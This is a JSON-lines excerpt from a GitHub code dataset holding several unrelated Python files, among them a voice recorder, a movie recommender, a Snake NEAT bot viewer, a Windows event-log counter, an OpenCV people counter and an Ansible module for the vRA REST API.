fw_configs\n\n\t# store input arguments in config\n\trecovery_config[\"args\"] = vars(args)\n\tlogger.debug(f\"recovery_config:{str(recovery_config)}\")\n\n","repo_name":"bootlin/snagboot","sub_path":"src/snagrecover/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"16"} +{"seq_id":"5054389047","text":"import luserver.scripts.general.flower as script\r\nfrom luserver.components.mission import TaskType\r\n\r\nclass ScriptComponent(script.ScriptComponent):\r\n\tdef on_skill_event(self, caster, event_name):\r\n\t\tif event_name == \"waterspray\":\r\n\t\t\tif \"blooming\" not in self.script_network_vars:\r\n\t\t\t\tself.object.physics.drop_loot(12317, caster)\r\n\t\t\t\tcaster.char.mission.update_mission_task(TaskType.Script, self.object.lot, mission_id=1136)\r\n\r\n\t\tsuper().on_skill_event(caster, event_name)\r\n","repo_name":"lcdr/luserver","sub_path":"luserver/scripts/crux_prime/aura_blossom_flower.py","file_name":"aura_blossom_flower.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"40700159998","text":"from typing import List\n\n\nclass AverageOfSubarrayOfSizeK:\n # Time complexity: O(N * K)\n def findAveragesBruteForce(self, k: int, arr: List[int]) -> List[float]:\n result = []\n for i in range(len(arr) - k + 1):\n _sum = 0\n for j in range(i, i + k):\n _sum += arr[j]\n result.append(_sum / k)\n return result\n\n # Time complexity: O(N)\n def findAverages(self, k: int, arr: List[int]) -> List[float]:\n result = []\n _sum = 0\n for i in range(len(arr)):\n _sum += arr[i]\n if i >= k - 1:\n result.append(_sum / k)\n _sum -= arr[i - k + 1]\n\n return result\n\n\nif __name__ == \"__main__\":\n print(AverageOfSubarrayOfSizeK().findAverages(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n print(AverageOfSubarrayOfSizeK().findAveragesBruteForce(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n","repo_name":"DenysLins/code-interview","sub_path":"patterns-for-coding-interview/sliding-window/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1821189371","text":"import tkinter as tk\r\nimport sounddevice as sd\r\nimport wavio\r\nimport os\r\nfrom datetime import datetime\r\n\r\nclass VoiceRecorderApp:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Voice Recorder App\")\r\n\r\n 
self.is_recording = False\r\n self.recording_filename = None\r\n\r\n # UI components\r\n self.record_button = tk.Button(root, text=\"Record\", command=self.toggle_recording)\r\n self.record_button.pack(pady=10)\r\n\r\n self.save_button = tk.Button(root, text=\"Save Recording\", command=self.save_recording, state=tk.DISABLED)\r\n self.save_button.pack(pady=5)\r\n\r\n # Start the GUI event loop\r\n root.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n root.mainloop()\r\n\r\n def toggle_recording(self):\r\n if not self.is_recording:\r\n self.start_recording()\r\n else:\r\n self.stop_recording()\r\n\r\n def start_recording(self):\r\n self.is_recording = True\r\n self.record_button.config(text=\"Stop Recording\")\r\n self.save_button.config(state=tk.DISABLED)\r\n\r\n # Set up audio recording\r\n self.recording_filename = f\"/Users\\logan\\Desktop{datetime.now().strftime('%Y%m%d_%H%M%S')}.wav\"\r\n self.stream = sd.InputStream(callback=self.audio_callback)\r\n self.stream.start()\r\n\r\n def stop_recording(self):\r\n self.is_recording = False\r\n self.record_button.config(text=\"Record\")\r\n self.save_button.config(state=tk.NORMAL)\r\n\r\n # Stop audio recording\r\n self.stream.stop()\r\n self.stream.close()\r\n\r\n def audio_callback(self, indata, frames, time, status):\r\n if status:\r\n print(status)\r\n wavio.write(self.recording_filename, indata, 44100, sampwidth=3)\r\n\r\n def save_recording(self):\r\n save_path = tk.filedialog.asksaveasfilename(defaultextension=\".wav\", filetypes=[(\"WAV files\", \"*.wav\")])\r\n if save_path:\r\n os.rename(self.recording_filename, save_path)\r\n tk.messagebox.showinfo(\"Save Recording\", \"Recording saved successfully!\")\r\n\r\n def on_closing(self):\r\n if self.is_recording:\r\n self.stop_recording()\r\n self.root.destroy()\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = VoiceRecorderApp(root)\r\n","repo_name":"Mxlzz31/CVIP","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11811999918","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import pairwise\nfrom scipy.sparse import csr_matrix\nimport sklearn\nimport pickle\nfrom utils import make_user_vector\n\nimport os\n#%%\n# movie given by the user\nquery = {\n # movieId, rating\n 4470:5,\n 48:5,\n 594:5,\n 27619:5,\n 152081:5,\n 595:5,\n 616:5,\n 1029:5\n}\n\n#%%\nratings = pd.read_csv('data/ratings.csv')\nmovies = pd.read_csv('data/movies.csv')\n#%%\nmovies.set_index('movieId').loc[query.keys()]\n#%%\nratings_per_movie = ratings.groupby('movieId')['rating'].count()\npopular_movies = ratings_per_movie[ratings_per_movie>30]\nratings = ratings.loc[ratings['movieId'].isin(popular_movies.index)]\nR = csr_matrix((ratings['rating'], (ratings['userId'], ratings['movieId'])))\n#%%Training\nsorted(sklearn.neighbors.VALID_METRICS_SPARSE['brute'])\n#%%\nmodel_nn = NearestNeighbors(metric='cosine')\nmodel_nn.fit(R)\n\n#%%Save the trained model\nwith open('./nn_recommender.pkl', 'wb') as file:\n pickle.dump(model_nn, file)\n\n#%%read the model from hard drive\nwith open('./nn_recommender.pkl', 'rb') as file:\n model_nn = pickle.load(file)\n\n#%%\nshape = model_nn.n_features_in_\nuser_vec = make_user_vector(query, shape)\n\n#%%calculate the score\ndistances, userIds = model_nn.kneighbors(user_vec, n_neighbors=10, 
return_distance=True)\ndistances = distances[0]\nuserIds = userIds[0]\n\n#%% extract the ratings of the similar users from the original data\nneighborhood = ratings.set_index('userId').loc[userIds]\n\n#%%score calculation\nscores = neighborhood.groupby('movieId')['rating'].mean()\n\n#%% give recommendations\nscores.loc[scores.index.isin(query.keys())] = 0\nscores.sort_values(ascending=False, inplace=True)\n#%%\nscores_10 = scores.head(10)\nrecommendations = movies.set_index('movieId').loc[scores_10.index]","repo_name":"damoon15/movie_recommander","sub_path":"model_train_neighborhood_recommender.py","file_name":"model_train_neighborhood_recommender.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42937621482","text":"\"\"\"\nCode to watch the best bot play Snake\n\"\"\"\nimport pickle\nimport game, bot\nimport neat\nimport numpy as np\n\ndef preset_food_pos_maker(positions):\n \"\"\"\n Returns a function that returns the next position in :positions: each time it's called\n :param positions: list of tuples\n :return: function with no args\n \"\"\"\n pos = positions\n def preset_food_pos():\n try:\n return pos.pop(0)\n except Exception:\n print('out of given positions; using random ones')\n return game.rand_pos()\n return preset_food_pos\n\ndef watch_best(genome_file, config_file, food_pos_file):\n \"\"\"\n Watch a particularly good game of Snake\n \"\"\"\n # Import best game data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n food_positions = pickle.load(open(food_pos_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n ## Play game\n # Must be true to observe game being played\n game.WATCH = True\n game.USE_FRAMERATE = True\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = preset_food_pos_maker(food_positions)\n\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\n\ndef watch_games(genome_file, config_file):\n \"\"\"\n Loads the given genome from file and plays Snake repeatedly, using that genome to control the bot\n :param genome_file: name of genome file\n \"\"\"\n # Import best genome data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n # Must be true to observe game being played\n # game.WATCH = True\n # game.USE_FRAMERATE = True\n\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = game.rand_pos\n\n while True:\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\ngame.FRAMERATE = 30\nwatch_best('best_genome.pkl', 'best_config.pkl', 'best_food_pos.pkl')\nwatch_games('best_genome.pkl', 'best_config.pkl')","repo_name":"nglaze00/Snake-reinforcement-learning","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7567085767","text":"from multiprocessing import Process, Manager\nimport Evtx.Evtx as evtx\nfrom bs4 import BeautifulSoup\n\npath = \"C:\\Windows\\System32\\winevt\\Logs\\Security.evtx\"\nEventCount = 0\nAllEvent = 0\nwith evtx.Evtx(path) as log:\n for x in 
log.records():\n AllEvent +=1\n\ndef CountTotal(d,MinNum,MaxNum):\n global EventCount\n print(MinNum,MaxNum)\n try:\n with evtx.Evtx(path) as log:\n for y in range(MinNum, MaxNum):\n print(\"Numbering : \",y)\n GetOne = log.get_record(1)\n print(GetOne)\n # GetOne = log.get_record(int(y))\n # soup = BeautifulSoup(GetOne.xml(), \"html.parser\")\n # System_ = soup.find(\"system\")\n # EventId = int(System_.find(\"eventid\").text)\n # if EventId == 4624:\n # EventCount += 1\n # print(\"EvsentCount\", EventCount)\n # d[0] += EventCount\n except Exception as e:\n print(e)\n\nif __name__ == '__main__':\n with Manager() as manager:\n d = manager.list([0 for i in range(5)])\n print(AllEvent)\n\n p1 = Process(target=CountTotal, args=(d,1,13325))\n # p2 = Process(target=CountTotal, args=(d,13325,AllEvent-13325))\n p1.start()\n # p2.start()\n\n p1.join()\n # p2.join()\n\n print(d)\n\n","repo_name":"jak010/study-python-src","sub_path":"etc/ExampleGroup/MultiProcessing/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17373806353","text":"import numpy as np\r\nimport cv2\r\nimport pandas,time\r\nfrom datetime import datetime\r\nfirst_frame=None\r\nstatus_list=[None,None]\r\ntimes=[]\r\ndf=pandas.DataFrame(columns=[\"Start\",\"End\"])\r\nvid = cv2.VideoCapture(0)\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\nwhile True:\r\n check, frame = vid.read()\r\n status=0\r\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n gray=cv2.GaussianBlur(gray,(21,21),0)\r\n\r\n if first_frame is None:\r\n first_frame=gray\r\n continue\r\n\r\n delta_frame=cv2.absdiff(first_frame,gray)\r\n thresh_frame=cv2.threshold(delta_frame, 30, 255, cv2.THRESH_BINARY)[1]\r\n thresh_frame=cv2.dilate(thresh_frame, None, iterations=2)\r\n\r\n (_,cnts,_)=cv2.findContours(thresh_frame.copy(),cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n for contour in cnts:\r\n if cv2.contourArea(contour) < 10000:\r\n continue\r\n status=1\r\n\r\n (x, y, w, h)=cv2.boundingRect(contour)\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0,255,0), 3)\r\n status_list.append(status)\r\n\r\n status_list=status_list[-2:]\r\n\r\n\r\n if status_list[-1]==1 and status_list[-2]==0:\r\n times.append(datetime.now())\r\n if status_list[-1]==0 and status_list[-2]==1:\r\n times.append(datetime.now())\r\n\r\n\r\n\r\n cv2.imshow(\"Gray Frame\",gray)\r\n cv2.imshow(\"Delta Frame\",delta_frame)\r\n cv2.imshow(\"Threshold Frame\",thresh_frame)\r\n cv2.imshow(\"Color Frame\",frame)\r\n\r\n faces = face_cascade.detectMultiScale(gray)\r\n print(faces)\r\n if len(faces) == 0:\r\n print (\"No faces found\")\r\n\r\n else:\r\n print(faces)\r\n print(faces.shape)\r\n print (\"Number of faces detected: \" + str(faces.shape[0]))\r\n\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(image,(x,y),(x+w,y+h),(0,255,0),1)\r\n\r\n cv2.rectangle(image, ((0,image.shape[0] -25)),(800, image.shape[0]), (255,255,255), -1)\r\n cv2.putText(image, \"Number of faces detected: \" + str(faces.shape[0]), (0,image.shape[0] -10), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0,0,0), 1)\r\n\r\n cv2.imshow('Image with faces',image)\r\n cv2.waitKey(0)\r\n\r\n key=cv2.waitKey(1)\r\n\r\n if key==ord('q'):\r\n if status==1:\r\n times.append(datetime.now())\r\n break\r\n\r\n\r\n\r\nprint(status_list)\r\nprint(times)\r\nfor i in range(0,len(times),2):\r\n 
df=df.append({\"Start\":times[i],\"End\":times[i+1]},ignore_index=True)\r\n\r\ndf.to_csv(\"Times.csv\")\r\n\r\nvideo.release()\r\ncv2.destroyAllWindows\r\n","repo_name":"divyadharshinichinnan/crowd-management-","sub_path":"count/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9510551494","text":" #!/usr/bin/python\n\nSOCKET_TIMEOUT = 30\nDEFAULT_TENANT = 'vsphere.local'\nDEFAULT_MEMORY = 512\nDEFAULT_CPUS = 1\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: vravm\nshort_description: A module that wraps the vRA 7 REST calls.\nversion_added: \"2.4\"\ndescription:\n - This module provides a wrapper for making vRA API REST calls to a specific\n vRA instance.\noptions:\n host:\n description:\n - This is vRA host name.\n required: true\n rest_method:\n description:\n - The name of the REST method to call on the host.\n required: true\n username:\n description:\n - The user name to use when logging into the vRA instance to\n retrieve a bearer token.\n required: false\n password:\n description:\n - The password for the user logging into the vRA instance to\n retrieve a bearer token.\n required: false\n vm_template:\n description:\n - The JSON blueprint template object that acts as the configuration\n for the VM to be provisioned.\n required: false\n tenant:\n description:\n - The tenant for the user making the REST call. This will default\n to \"vsphere.local\".\n required: false\n token:\n description:\n - The bearer token to use with all calls other than the one to\n retrieve the bearer token.\n required: false\n catalog_item_id:\n description:\n - The ID of the catalog item that is to be the target of the method\n execution.\n required: false\nauthor:\n - Todd Blackwell (@vmware.com)\n'''\n\nEXAMPLES = '''\n# Retrieve a bearer token\n- name: Get a Bearer Token\n vra7rest:\n host: vra-01a.corp.local\n rest_method: get_bearer_token\n username: jason\n password: VMware1!\n tenant: vsphere.local\n'''\n\nRETURN = '''\noriginal_message:\n description: The original name param that was passed in\n type: str\nmessage:\n description: The output message that the sample module generates\n'''\n\nimport json\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.urls import fetch_url, url_argument_spec\n\ndef set_json_value(json, path_list, new_value):\n\n if len(path_list) > 1:\n outer_most_path_element = path_list.pop(0)\n sub_json_object = json[outer_most_path_element]\n set_json_value(sub_json_object, path_list, new_value)\n else:\n json[path_list[0]] = new_value\n\ndef main():\n # Define the parameters that a user can pass into this module.\n module_args = dict(\n host=dict(type='str', required=True),\n username=dict(type='str', required=True),\n password=dict(type='str', required=True, no_log=True),\n tenant=dict(type='str', required=False, default=DEFAULT_TENANT),\n blueprint_name=dict(type='str', required=False),\n memory=dict(type='str', required=False, default=DEFAULT_MEMORY),\n cpu_count=dict(type='str', required=False, default=DEFAULT_CPUS),\n number_of_instances=dict(type='str', required=False, default='1'),\n wait_for_vm=dict(type='str', required=False, default=False),\n validate_certs=dict(type='str', required=False)\n )\n\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': 
'',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n # seed the result dict in the object\n # we primarily care about changed and state\n # change is if this module effectively modified the target\n # state will include any data that you want your module to pass back\n # for consumption, for example, in a subsequent task\n result = dict(\n result_text='',\n output=''\n )\n\n # the AnsibleModule object will be our abstraction working with Ansible\n # this includes instantiation, a couple of common attr would be the\n # args/params passed to the execution, as well as if the module\n # supports check mode\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n host = module.params['host']\n username = module.params['username']\n password = module.params['password']\n tenant = module.params['tenant']\n blueprint_name = module.params['blueprint_name']\n memory = module.params['memory']\n cpu_count = module.params['cpu_count']\n number_of_instances = module.params['number_of_instances']\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': '',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n #===========================================================================\n # The first step is to get the bearer token.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/identity/api/tokens'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json'}\n body_json = {'username': username,\n 'password': password,\n 'tenant': tenant}\n body = json.dumps(body_json)\n\n # Make the REST call to get the bearer token.\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n response_json = json.loads(response_content)\n bearer_token = response_json[\"id\"]\n\n output['bearer_token'] = bearer_token\n\n #===========================================================================\n # Get the list of catalog items.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItemViews'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n catalog_items = json.loads(response_content)['content']\n\n # Find the catalog item that matches the blueprint name passed into this\n # module.\n blueprint_item = {}\n for catalog_item in catalog_items:\n if catalog_item['name'] == blueprint_name:\n blueprint_item = catalog_item\n\n if blueprint_item:\n blueprint_catalog_item_id = blueprint_item['catalogItemId']\n\n output['blueprint_item'] = blueprint_item\n output['blueprint_catalog_item_id'] = blueprint_catalog_item_id\n else:\n raise Exception(\"Blueprint could not be found\")\n\n #===========================================================================\n # Get the blueprint template using the catalog ID.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host 
+ '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests/template'\n headers = {'Accept':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n blueprint_template = json.loads(response_content)\n\n output['blueprint_template'] = blueprint_template\n\n #===========================================================================\n # Update the template with the new values supplied by the user.\n #===========================================================================\n blueprint_data_item_name = blueprint_name.replace(' ', '_')\n memory_path = 'data/' + blueprint_data_item_name + '/data/memory'\n cpus_path = 'data/' + blueprint_data_item_name + '/data/cpu'\n number_of_instances_path = 'data/_number_of_instances'\n\n memory_path_list = memory_path.split('/')\n cpus_path_list = cpus_path.split('/')\n number_of_instances_list = number_of_instances_path.split('/')\n\n set_json_value(blueprint_template, memory_path_list, memory)\n set_json_value(blueprint_template, cpus_path_list, cpu_count)\n set_json_value(blueprint_template, number_of_instances_list, number_of_instances)\n\n #===========================================================================\n # Submit the modified blueprint template to provision the VM.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=json.dumps(blueprint_template),\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n output['response'] = response\n output['url'] = url\n output['headers'] = headers\n response_content = response.read()\n blueprint_template = json.loads(response_content)\n\n # If the user is working with this module in only check mode we do not\n # want to make any changes to the environment, just return the current\n # state with no modifications\n if module.check_mode:\n return result\n\n # Use whatever logic you need to determine whether or not this module\n # made any modifications to your target\n if module.params['host']:\n result['changed'] = True\n\n # during the execution of the module, if there is an exception or a\n # conditional state that effectively causes a failure, run\n # AnsibleModule.fail_json() to pass in the message and the result\n if module.params['host'] == 'fail me':\n module.fail_json(msg='You requested this to fail', **result)\n\n #result['output'] = output\n\n # in the event of a successful module execution, you will want to\n # simple AnsibleModule.exit_json(), passing the key/value results\n module.exit_json(**result)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tblackwell/ansible-vra-rest","sub_path":"modules/vravm.py","file_name":"vravm.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"21860069898","text":"import sys\r\nfrom collections import defaultdict, deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m, k = map(int, input().split())\r\n\r\nground = defaultdict(deque)\r\n\r\nnutrition = [\r\n [5] 
* n\r\n for _ in range(n)\r\n]\r\n\r\nplus_nutrition = [\r\n list(map(int, input().split()))\r\n for _ in range(n)\r\n]\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n # 인덱스를 맞추기 위해 1씩 차감\r\n x -= 1; y -= 1\r\n \r\n # 나무 나이 삽입\r\n ground[(x, y)].append(z)\r\n \r\n# 봄 -> 나무가 자신의 위치에서 나이만큼 양분을 먹고 나이 1 증가\r\n# 그것이 안된다면 죽고, 여름에 해당 위치에 양분으로 남음\r\ndef spring_and_summer(): \r\n # key : 나무가 심어진 좌표 튜플\r\n for key in list(ground.keys()):\r\n x, y = key\r\n # 해당 좌표에 새로 기록할 나무 나이 정보\r\n temp_deque = deque()\r\n \r\n # 현재 좌표에서 죽은 나무\r\n dead_tree = 0\r\n \r\n # 나이가 어린 나무부터 양분을 먹음\r\n for tree_age in ground[key]:\r\n # 양분을 먹을 수 있는 경우 나이만큼 먹고 임시 힙에 삽입\r\n if nutrition[x][y] >= tree_age:\r\n temp_deque.append(tree_age+1) # 임시 큐에 저장\r\n nutrition[x][y] -= tree_age\r\n \r\n # 먹을 수 없다면 죽음\r\n else:\r\n dead_tree += tree_age // 2\r\n\r\n # 새로 기록한 나무 나이 저장\r\n ground[key] = temp_deque\r\n \r\n # 해당 위치에서 죽은 나무로 양분 추가\r\n nutrition[x][y] += dead_tree\r\n\r\n\r\n# 가을에는 나이가 5배수인 나무가 주변 8칸으로 번식\r\ndef autumn_and_winter():\r\n # 나무가 번식하는 주변 위치\r\n dxs = [-1, -1, -1, 0, 0, 1, 1, 1]\r\n dys = [-1, 0, 1, -1, 1, -1, 0, 1]\r\n \r\n for key in list(ground.keys()):\r\n x, y = key\r\n for tree_age in ground[key]:\r\n if tree_age % 5 != 0:\r\n continue\r\n \r\n # 주변 8칸으로 나이가 1인 나무 번식\r\n for dx, dy in zip(dxs, dys):\r\n nx, ny = x + dx, y + dy\r\n \r\n # 땅을 벗어나지 않는다면 해당 칸으로 번식\r\n if 0 <= nx < n and 0 <= ny < n:\r\n ground[(nx, ny)].appendleft(1)\r\n \r\n # 겨울에는 로봇이 땅을 돌아다니며 양분을 추가함\r\n for x in range(n):\r\n for y in range(n):\r\n nutrition[x][y] += plus_nutrition[x][y]\r\n \r\n \r\n# k년 동안 계절 사이클을 반복 후 전체 나무의 개수를 구한다.\r\nfor _ in range(k):\r\n spring_and_summer()\r\n autumn_and_winter()\r\n\r\nanswer = 0\r\nfor key in list(ground.keys()):\r\n answer += len(ground[key])\r\n \r\nprint(answer)","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/16235. 
나무 재테크/나무 재테크.py","file_name":"나무 재테크.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12566628400","text":"import sys\r\nimport socket\r\nimport time\r\nimport argparse\r\nfrom STPSegment import STPSegment\r\n\r\nclass Sender:\r\n def __init__(self, sender_port, receiver_port, file_to_send, max_win, rto):\r\n self.sender_port = sender_port\r\n self.receiver_port = receiver_port\r\n self.file_to_send = file_to_send\r\n self.max_win = max_win\r\n self.rto = rto\r\n\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n self.sock.bind(('localhost', self.sender_port))\r\n self.sock.settimeout(0.5)\r\n self.ISN = 0\r\n self.log_file = open(\"sender_log.txt\", \"w\")\r\n self.start_time = None\r\n\r\n def log(self, snd_rcv, packet_type, seq_num, num_bytes):\r\n current_time = time.time()\r\n elapsed_time = round(current_time - self.start_time, 5) if self.start_time is not None else 0\r\n pack_type = \"DATA\"\r\n\r\n if packet_type==1:\r\n pack_type = \"ACK\"\r\n elif packet_type==2:\r\n pack_type = \"SYN\"\r\n elif packet_type==3:\r\n pack_type = \"FIN\"\r\n elif packet_type==4:\r\n pack_type = \"RESET\"\r\n\r\n log_str = f\"{snd_rcv} {elapsed_time}s {pack_type} {seq_num} {num_bytes}\\n\"\r\n self.log_file.write(log_str)\r\n\r\n # DATA = 0, ACK = 1, SYN = 2, FIN = 3, RESET = 4\r\n def send_syn(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=2)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 2, seq_num, 0)\r\n \r\n\r\n def send_fin(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=3)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n\r\n self.log(\"snd\", 3, seq_num, 0)\r\n\r\n def connection_establish(self):\r\n retry_count = 0\r\n self.start_time = time.time()\r\n while retry_count < 3:\r\n try:\r\n self.send_syn(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n\r\n if segment.segment_type==1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n \r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION ESTABLISHING\")\r\n retry_count += 1\r\n \r\n return False\r\n \r\n def connection_terminate(self):\r\n retry_count = 0\r\n while retry_count < 3:\r\n try:\r\n self.send_fin(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n if segment.segment_type==1 and segment.seq_num==self.ISN + 1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION TERMINATION\")\r\n retry_count += 1\r\n \r\n return False\r\n\r\n def send_data(self):\r\n if self.connection_establish():\r\n with open(self.file_to_send, 'rb') as file:\r\n filedata = file.read(1000)\r\n while filedata:\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n # new seq num if the send works\r\n temp_seq = self.ISN + len(filedata)\r\n\r\n ack_received = False\r\n\r\n while not ack_received:\r\n try:\r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n if segment.seq_num >= temp_seq:\r\n # The seq number in 
the ack matches or is ahead of the one we are about to send out\r\n ack_received = True\r\n self.ISN = segment.seq_num\r\n temp_seq = segment.seq_num\r\n else:\r\n # oh our dat wasnt lost their ack was lost so now they're ahead of us\r\n pass\r\n \r\n except socket.timeout:\r\n # Didnt receive an ack so we can only assume our sent data was lost so resend\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n\r\n self.ISN = temp_seq\r\n time.sleep(0.05)\r\n filedata = file.read(1000)\r\n \r\n # Send the end of transmission segment with FIN flag\r\n if self.connection_terminate():\r\n print(\"COMPLETE PROGRAM\")\r\n \r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Sender')\r\n parser.add_argument('sender_port', type=int, help='Sender port number')\r\n parser.add_argument('receiver_port', type=int, help='Receiver port number')\r\n parser.add_argument('file_to_send', type=str, help='File to send')\r\n parser.add_argument('max_win', type=int, help='Max Window Size in bytes')\r\n parser.add_argument('rto', type=str, help='Retransmission time')\r\n args = parser.parse_args()\r\n\r\n sender = Sender(args.sender_port, args.receiver_port, args.file_to_send, args.max_win, args.rto)\r\n sender.send_data()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"mira-moonbeam/simpleSTPwithSlidingWindow","sub_path":"Sender.py","file_name":"Sender.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9094876651","text":"import numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport pandas as pd\n\ndef sel_train_data_lead(nc_in_file,target_len,\n s_target_date,e_target_date,\n rw_1,lead_time,rw,ntimestep):\n '''\n This function inputs a 2-D file.nc, reads it as a xarray and creates\n a 